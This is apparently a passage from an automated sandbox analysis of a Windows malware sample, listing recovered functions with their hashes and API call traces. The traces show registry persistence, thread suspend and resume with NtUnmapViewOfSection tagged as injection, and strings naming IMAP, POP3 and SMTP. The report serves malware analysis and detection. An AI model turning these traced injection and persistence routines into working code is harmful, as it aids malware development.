    • Part of subcall function 001CBB13: HeapFree.KERNEL32(00000000,00000000), ref: 001CBB84
  • FlushFileBuffers.KERNEL32(?), ref: 001CBC73
  • DisconnectNamedPipe.KERNEL32(?,?,?,00000010,00000000), ref: 001CBC7C
  • WaitForSingleObject.KERNEL32(001EB094,00000000), ref: 001CBC89
  • GetLastError.KERNEL32 ref: 001CBCAB
  • CloseHandle.KERNEL32(?), ref: 001CBCB8
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DB838, Relevance: 15.1, APIs: 10, Instructions: 64 Total matches: 62sleepsynchronization
Similarity
  • Total matches: 62
  • API ID: CloseHandle$LocalFreeRtlDeleteCriticalSectionRtlEnterCriticalSectionRtlLeaveCriticalSectionSetEventSleepWaitForSingleObject
  • String ID:
  • API String ID: 1546928802-0
  • Opcode ID: 44cbb82d1bc8bc2d29e416fe044868003d437d2d6ba21b65bae40637e45a7bca
  • Instruction ID: 191c3ac2f4053567846d1cc33e924360c7a86817a4ea2a5247009256dd1e7f80
  • Opcode Fuzzy Hash: 18E02BA421196647D99708B00461B1FAE82BBE23E484C3303F552A25C2BB0712C4DF2A
  • Instruction Fuzzy Hash: 191c3ac2f4053567846d1cc33e924360c7a86817a4ea2a5247009256dd1e7f80
APIs
  • SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
  • CloseHandle.KERNEL32(?), ref: 001DB86F
  • CloseHandle.KERNEL32(?), ref: 001DB87D
  • RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
  • RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
  • Sleep.KERNEL32(000001F4), ref: 001DB8C1
  • CloseHandle.KERNEL32(?), ref: 001DB8CE
  • LocalFree.KERNEL32(?), ref: 001DB8DC
  • RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DF75B, Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 172 Total matches: 23string
Similarity
  • Total matches: 23
  • API ID: LocalFreelstrcatlstrcpymemcpy
  • String ID: IMAP$P$POP3$SMTP
  • API String ID: 2001391702-3667654339
  • Opcode ID: 43434d26df3a4f5d7c34ecf30ecc38ca90c9099c92fdaea40e4787011e532f06
  • Instruction ID: 6478c962306ff3ebee45f1e70cc600bc5173ee11dde7fe85537008a4b3b65a8d
  • Opcode Fuzzy Hash: 3911AF310449E3F79AAB229950026AB81429F117E2E5C9B21ED7C785CF6F03B14B770D
  • Instruction Fuzzy Hash: 6478c962306ff3ebee45f1e70cc600bc5173ee11dde7fe85537008a4b3b65a8d
APIs
  • lstrcpyW.KERNEL32(00000000,001ED5A0), ref: 001DF84B
  • lstrcatW.KERNEL32(00000000,00000000), ref: 001DF853
  • memcpy.NTDLL(00000000,?,00000000,-00000002), ref: 001DF8F1
  • LocalFree.KERNEL32(?,-00000002), ref: 001DF908
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
    • Part of subcall function 001D93F1: lstrlenW.KERNEL32(00000000,00000000,001EAC44), ref: 001D9401
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DAFC4, Relevance: 13.8, APIs: 9, Instructions: 278 Total matches: 59memorythread
Similarity
  • Total matches: 59
  • API ID: GetLastError$VirtualAlloc$RtlEnterCriticalSectionRtlLeaveCriticalSectionSwitchToThread
  • String ID:
  • API String ID: 2452875170-0
  • Opcode ID: f7250d7c747c6724e85bc87f4a1d164c9bcb3d791413c0bfd27e5859a3665385
  • Instruction ID: e9cda0ef1bba535e69377ecfbf93933b7da227d9232d932a7ffe86fd6aa33c96
  • Opcode Fuzzy Hash: F931CCA2419FC2A7D5936A400890BBAC5C3FB12FF6D6CA732B674A02C81FC5274D2F54
  • Instruction Fuzzy Hash: e9cda0ef1bba535e69377ecfbf93933b7da227d9232d932a7ffe86fd6aa33c96
APIs
  • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 001DB03B
  • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 001DB05A
  • GetLastError.KERNEL32 ref: 001DB20B
  • GetLastError.KERNEL32 ref: 001DB28D
  • SwitchToThread.KERNEL32(?,?,?,?), ref: 001DB2D2
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • GetLastError.KERNEL32 ref: 001DB308
  • GetLastError.KERNEL32 ref: 001DB317
  • RtlEnterCriticalSection.NTDLL(?), ref: 001DB327
  • RtlLeaveCriticalSection.NTDLL(?), ref: 001DB338
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CAC3A, Relevance: 13.6, APIs: 9, Instructions: 124 Total matches: 61memorystring
Similarity
  • Total matches: 61
  • API ID: memcpy$RtlAllocateHeapmemset$HeapFreelstrcmpi
  • String ID:
  • API String ID: 2612869081-0
  • Opcode ID: c2dacee3140373e500c22aac8ec47d9c8ec65dfe813f0c9f26dc5badd2c4d201
  • Instruction ID: 2a6ed72f7be82828a989acab500aa79ad59f26800ec0c1f59594e6530e87086a
  • Opcode Fuzzy Hash: 4201C028044DC281C42710841061FF9A506EFD13B5C8CAB76DDA13F08B5D0273F53797
  • Instruction Fuzzy Hash: 2a6ed72f7be82828a989acab500aa79ad59f26800ec0c1f59594e6530e87086a
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • RtlAllocateHeap.NTDLL(00000000,00000018,001ED278), ref: 001CAC70
  • memset.NTDLL ref: 001CAC81
  • lstrcmpi.KERNEL32(?,?), ref: 001CACC1
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CACEA
  • memcpy.NTDLL(00000000,?,?), ref: 001CACFE
  • memset.NTDLL ref: 001CAD0B
  • memcpy.NTDLL(?,?,?,?,00000000,?,00000000,?,?), ref: 001CAD24
  • memcpy.NTDLL(-00000005,001EC42B,00000007,?,?,?,?,00000000,?,00000000,?,?), ref: 001CAD3F
  • HeapFree.KERNEL32(00000000,?), ref: 001CAD5C
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CB593, Relevance: 13.6, APIs: 9, Instructions: 115 Total matches: 61memorystring
Similarity
  • Total matches: 61
  • API ID: RtlAllocateHeaplstrlen$HeapFree_wcsuprlstrcatlstrcpymemcpy
  • String ID:
  • API String ID: 1573093752-0
  • Opcode ID: f08ef74051028bad1df3046b05b27150d2409501bab8048f9561d94f45d3640f
  • Instruction ID: 49f792a003b958594b94fef63a2c1694da6c43edfde979eb277695decca324f2
  • Opcode Fuzzy Hash: F9F0FEB01D1901DB8023453EE06037DE502AC442E2B1C8617FD80B525F7F4372E0BF59
  • Instruction Fuzzy Hash: 49f792a003b958594b94fef63a2c1694da6c43edfde979eb277695decca324f2
APIs
  • lstrlenW.KERNEL32(00000000), ref: 001CB606
  • RtlAllocateHeap.NTDLL(00000000,001EAC82), ref: 001CB61C
  • memcpy.NTDLL(00000000,00000000,001EAC80), ref: 001CB62F
  • _wcsupr.NTDLL ref: 001CB63A
  • lstrlenW.KERNEL32(?,001EAC80), ref: 001CB66C
  • RtlAllocateHeap.NTDLL(00000000,?,001EAC80), ref: 001CB681
  • lstrcpyW.KERNEL32(00000000,?), ref: 001CB697
  • lstrcatW.KERNEL32(00000000,001EC940), ref: 001CB6B5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CB6C4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C4CEB, Relevance: 13.6, APIs: 9, Instructions: 94 Total matches: 33filememorystring
Similarity
  • Total matches: 33
  • API ID: lstrlen$CloseHandleDeleteFileHeapFreeMapViewOfFileRtlAllocateHeapUnmapViewOfFilewcstombs
  • String ID:
  • API String ID: 3071814901-0
  • Opcode ID: d05e3ff4273796c9b17326ba3024fd4693d54f1ec967c9ade7a5abc202e65e4f
  • Instruction ID: 7e783e8648c44d89f659e24c24dcd4eaacf23487424efcd1c96aaf08dceaf5d1
  • Opcode Fuzzy Hash: 8DF08B71654AC2CBD22778A6A6517BBF901FB532C3C4E3732DC40251681F4232D22B1B
  • Instruction Fuzzy Hash: 7e783e8648c44d89f659e24c24dcd4eaacf23487424efcd1c96aaf08dceaf5d1
APIs
    • Part of subcall function 001C7262: memset.NTDLL ref: 001C7284
    • Part of subcall function 001C7262: lstrlenW.KERNEL32(?,?,?,?,?,?), ref: 001C72C8
    • Part of subcall function 001C7262: OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 001C730E
    • Part of subcall function 001C7262: CloseHandle.KERNEL32(?), ref: 001C7331
  • MapViewOfFile.KERNEL32(?,00000004,00000000,00000000,?,?,?,?), ref: 001C4D32
  • CloseHandle.KERNEL32(?), ref: 001C4D3E
  • lstrlenW.KERNEL32(00000000), ref: 001C4D58
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C4D69
  • wcstombs.NTDLL ref: 001C4D7A
  • lstrlen.KERNEL32(?), ref: 001C4D87
    • Part of subcall function 001D9462: lstrlen.KERNEL32(-00000002,00000000,?,-00000002,-00000002,?,001C4D99), ref: 001D9472
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL ref: 001DDEA1
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,001EC117), ref: 001DDF4F
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDFC7
    • Part of subcall function 001DDE6F: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DE039
    • Part of subcall function 001DDE6F: lstrcpy.KERNEL32(00000000,00000000), ref: 001DE061
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,?), ref: 001DE06F
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,00000000), ref: 001DE07F
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE12C
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,001EB1C0), ref: 001DE176
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DE185
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE197
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000), ref: 001DE1AD
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?), ref: 001DE1BC
  • UnmapViewOfFile.KERNEL32(?,?,?,?,00000000,00000001), ref: 001C4DBC
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C4DCE
  • DeleteFileW.KERNEL32(?), ref: 001C4DDC
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C164D, Relevance: 13.6, APIs: 9, Instructions: 89 Total matches: 49memoryregistrystring
Similarity
  • Total matches: 49
  • API ID: GetTickCountHeapFreeRegCloseKeyRegCreateKeyRtlAllocateHeapRtlImageNtHeaderStrRChrlstrlenwsprintf
  • String ID:
  • API String ID: 473458267-0
  • Opcode ID: 21cd21af9a4aaeb0892998a3b8bf2ca0770d14e129f35d2f1317603fddf0a3d6
  • Instruction ID: 233c1588e08a29c017db756c2c3cc83d8e7a4f483530507245655a67d20bfa99
  • Opcode Fuzzy Hash: 82F05935850C435DC06788E5483AB3BE6417B002D8DDC6A33F9416D2066F8332969B6B
  • Instruction Fuzzy Hash: 233c1588e08a29c017db756c2c3cc83d8e7a4f483530507245655a67d20bfa99
APIs
  • RtlImageNtHeader.NTDLL(?), ref: 001C165E
  • RtlAllocateHeap.NTDLL(00000000,00000011), ref: 001C1685
  • GetTickCount.KERNEL32 ref: 001C169C
  • wsprintfA.USER32 ref: 001C16AC
  • RegCreateKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C16E0
  • StrRChrA.SHLWAPI(00000000,00000000,00000000), ref: 001C16F8
  • lstrlen.KERNEL32(00000000), ref: 001C1702
  • RegCloseKey.ADVAPI32(?), ref: 001C171E
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C172C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CB978, Relevance: 13.6, APIs: 9, Instructions: 82 Total matches: 110file
Similarity
  • Total matches: 110
  • API ID: GetLastError$CancelIoCloseHandleCreateEventGetOverlappedResultReadFileWaitForMultipleObjectsWriteFile
  • String ID:
  • API String ID: 340323113-0
  • Opcode ID: c76374ab722defcc6b7910d2b5a917f55ad2d99158a8d4548ff4996c05cdb32e
  • Instruction ID: 4663223eb685f44cb7c3c2feaea3cf8fb5c10da6263795c37b1e1976f57e1679
  • Opcode Fuzzy Hash: B7E05C3D03050183442319B00225F9BAF186F662C7A8C33E2FE84CD6975B01BBE58152
  • Instruction Fuzzy Hash: 4663223eb685f44cb7c3c2feaea3cf8fb5c10da6263795c37b1e1976f57e1679
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,001CBA84,00000008,?,00000010,00000001,00000000,0000012B), ref: 001CB997
  • WriteFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9CB
  • ReadFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9D3
  • GetLastError.KERNEL32 ref: 001CB9DD
  • WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00002710), ref: 001CB9F9
  • GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 001CBA12
  • CancelIo.KERNEL32(?), ref: 001CBA27
  • CloseHandle.KERNEL32(?), ref: 001CBA37
  • GetLastError.KERNEL32 ref: 001CBA3F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DC371, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 109 Total matches: 97threadsynchronizationinjection
Similarity
  • Total matches: 97
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID: d
  • API String ID: 307323562-2564639436
  • Opcode ID: 3424cbb1137d2442c81198497add0441f4db132d4a2ce8cb8b6f8920268ef235
  • Instruction ID: b8db2ac21e3ce66b9afee30e9f9d0f5fd3c10acb7799db9a356edd2bebb0603d
  • Opcode Fuzzy Hash: 76018E064AAA7143C6022C158545FBAF186EB03FB9C5CF710D560304CE0B4574E1F669
  • Instruction Fuzzy Hash: b8db2ac21e3ce66b9afee30e9f9d0f5fd3c10acb7799db9a356edd2bebb0603d
APIs
  • memset.NTDLL ref: 001DC393
    • Part of subcall function 001D8325: GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
    • Part of subcall function 001D8325: GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
    • Part of subcall function 001D8325: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
    • Part of subcall function 001D8325: IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
    • Part of subcall function 001D8325: CloseHandle.KERNEL32(00000000), ref: 001D8391
    • Part of subcall function 001D90C0: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D90ED
    • Part of subcall function 001D90C0: SetLastError.KERNEL32(00000000,?,001DC3F5,00000000,?,00010007,00000004,?), ref: 001D90F4
  • ResumeThread.KERNEL32(?,00000000,?,?,00000000,?,00010007,00000004,?), ref: 001DC42A
  • WaitForSingleObject.KERNEL32(00000064), ref: 001DC438
  • SuspendThread.KERNEL32(?), ref: 001DC450
    • Part of subcall function 001D909F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D90B7
    • Part of subcall function 001DC212: memset.NTDLL ref: 001DC240
    • Part of subcall function 001DC212: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 001DC2CA
    • Part of subcall function 001DC212: WaitForSingleObject.KERNEL32(00000064), ref: 001DC2D8
    • Part of subcall function 001DC212: SuspendThread.KERNEL32(?), ref: 001DC2EB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
  • GetLastError.KERNEL32(00000000,?,00010007,00000004,?), ref: 001DC4C5
  • ResumeThread.KERNEL32(00000004), ref: 001DC4D6
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3996, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 105 Total matches: 51registryfilememory
Similarity
  • Total matches: 51
  • API ID: CreateFileGetLastErrorHeapFreeRegCloseKeyRegOpenKey
  • String ID: [FILE]$[FILE]
  • API String ID: 3351174444-3230400787
  • Opcode ID: 033c4394e70e99a6bf63e685e4473468f8b4c093a00da4e8f42c8e7bfe120adf
  • Instruction ID: 2fcb9902772c4c4d4bc9c17d65ab76f3f424010ff8a5c77d50f6198a202490f7
  • Opcode Fuzzy Hash: 85F0DD3A594EC3CFD423249020157BAC805FB412E2CAD2716EA807E1C16F8333192F17
  • Instruction Fuzzy Hash: 2fcb9902772c4c4d4bc9c17d65ab76f3f424010ff8a5c77d50f6198a202490f7
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C39AA
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
    • Part of subcall function 001D9EAA: lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
    • Part of subcall function 001D9EAA: lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
    • Part of subcall function 001D9EAA: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
    • Part of subcall function 001D95E9: lstrlenW.KERNEL32(?,00000000,001EAC80,?,?,?,001C1784,00000000,?,001C17F3,?,?,?,?,00000000), ref: 001D95F5
    • Part of subcall function 001D95E9: memcpy.NTDLL(00000000,?,00000000,00000002,?,?,?,001C1784,00000000,?,001C17F3,?,?,?,?,00000000), ref: 001D961D
    • Part of subcall function 001D95E9: memset.NTDLL ref: 001D962F
    • Part of subcall function 001C28FD: RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001C28FD: lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
    • Part of subcall function 001C28FD: lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
    • Part of subcall function 001C28FD: RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C3A90
  • GetLastError.KERNEL32 ref: 001C3A9B
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C3AB0
  • RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 001C3AC1
    • Part of subcall function 001C29BF: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001C29BF: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
    • Part of subcall function 001C29BF: lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
    • Part of subcall function 001C29BF: HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C1B85, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 79 Total matches: 31memoryfilestring
Similarity
  • Total matches: 31
  • API ID: CreateDirectory$CopyFileHeapFreeRtlAllocateHeaplstrcpy
  • String ID: \sols
  • API String ID: 2898405644-25449109
  • Opcode ID: 5497166955076156837619a2a098418b7cb76563a9d137fec855e451e2c56df1
  • Instruction ID: 44ec2210092a92e039f9b1496625380036570e436bac4a4be39adbf8d21673e3
  • Opcode Fuzzy Hash: F2E0ABB50504208B9013D4B671183389C4698102F219D4511FB06BC48FAFD302A5FB6E
  • Instruction Fuzzy Hash: 44ec2210092a92e039f9b1496625380036570e436bac4a4be39adbf8d21673e3
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1BC4
  • lstrcpyW.KERNEL32(00000000,001C1DC2), ref: 001C1BD5
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1BEC
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1C05
  • CopyFileW.KERNEL32(?,00000000,00000000), ref: 001C1C34
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C1C42
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C27F6, Relevance: 12.1, APIs: 8, Instructions: 52 Total matches: 80registry
Similarity
  • Total matches: 80
  • API ID: GetLastError$CloseHandleDuplicateHandleOpenProcessRegCloseKeyRegCreateKeyRegOpenKey
  • String ID:
  • API String ID: 3239362136-0
  • Opcode ID: 43d6ef705f251b34ef39b149b3ea3bd8fb900b51b25fecf4a76b54cbc8c7a116
  • Instruction ID: 43568bf06b197137d00305a6dda9a24464bc0a833492d0823832902715db9840
  • Opcode Fuzzy Hash: 4CD0C2B8000985CF04479878487AAFFEA01BEC21C155C5A72F9C06824F769172DF0B6B
  • Instruction Fuzzy Hash: 43568bf06b197137d00305a6dda9a24464bc0a833492d0823832902715db9840
APIs
  • OpenProcess.KERNEL32(00000040,00000000,?), ref: 001C2802
  • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 001C2820
  • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 001C2828
  • DuplicateHandle.KERNEL32(?,00000000,?,00000000,00000000,00000002), ref: 001C2846
  • GetLastError.KERNEL32 ref: 001C285A
  • RegCloseKey.ADVAPI32(?), ref: 001C2865
  • CloseHandle.KERNEL32(00000000), ref: 001C286C
  • GetLastError.KERNEL32 ref: 001C2874
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CDCEC, Relevance: 10.7, APIs: 7, Instructions: 161 Total matches: 54memorythreadsleep
Similarity
  • Total matches: 54
  • API ID: GetCurrentThreadGetCurrentThreadIdRtlAllocateHeapRtlEnterCriticalSectionRtlLeaveCriticalSectionSleepmemset
  • String ID:
  • API String ID: 2472442912-0
  • Opcode ID: dc49271e526c1696018041de0017b0827111101275221657691e75393d626545
  • Instruction ID: a1ba47e9cb500db2a87726f60fc19047a378d35199e4f4ec398e997f9554d1b5
  • Opcode Fuzzy Hash: AA11AD32257B7013C12B648249A877EFA85F7420DBC8C7610FAA43906D1F4792D05F7A
  • Instruction Fuzzy Hash: a1ba47e9cb500db2a87726f60fc19047a378d35199e4f4ec398e997f9554d1b5
APIs
  • RtlAllocateHeap.NTDLL ref: 001CDD25
  • memset.NTDLL ref: 001CDD39
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • GetCurrentThreadId.KERNEL32(?,00001000,00001000,?), ref: 001CDDC8
  • GetCurrentThread.KERNEL32 ref: 001CDDDB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001CDE7E
  • Sleep.KERNEL32(0000000A), ref: 001CDE88
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001CDEAE
    • Part of subcall function 001CDCA5: NtUnmapViewOfSection.NTDLL(079007F4), ref: 001CDCCE
    • Part of subcall function 001CDCA5: RtlNtStatusToDosError.NTDLL(00000000), ref: 001CDCD5
    • Part of subcall function 001CDCA5: HeapFree.KERNEL32(00000000,00000000,079007F4), ref: 001CDCE4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C9D54, Relevance: 10.6, APIs: 7, Instructions: 144 Total matches: 54memoryregistry
Similarity
  • Total matches: 54
  • API ID: HeapFree$RegCloseKeyRegCreateKey
  • String ID:
  • API String ID: 3276616890-0
  • Opcode ID: b82f1d124a686c0fba74e06d606f12bbe42e9b5bf24afcb4d9ffa1ad41822641
  • Instruction ID: c57badf541bd68534790deaa67724b48a31e467339e930acdbfe2d3de4c2c09d
  • Opcode Fuzzy Hash: 4A118C6A048DC253C06778C5B1BB7F5C412BB82CD0C4D1363FEA46D65C6E8372D66B02
  • Instruction Fuzzy Hash: c57badf541bd68534790deaa67724b48a31e467339e930acdbfe2d3de4c2c09d
APIs
  • RegCreateKeyA.ADVAPI32(80000001,?), ref: 001C9DC7
  • HeapFree.KERNEL32(00000000,?), ref: 001C9E08
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9E18
  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,001CA93B,00000000,?,?,?), ref: 001C9EA8
    • Part of subcall function 001C9BEF: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
    • Part of subcall function 001C9BEF: RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
    • Part of subcall function 001C9BEF: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9BEF: HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
    • Part of subcall function 001C9BEF: memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C9E84
    • Part of subcall function 001C947B: lstrlen.KERNEL32(?,001E5048,00000000), ref: 001C94A0
    • Part of subcall function 001C947B: wsprintfA.USER32 ref: 001C94E0
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C9514
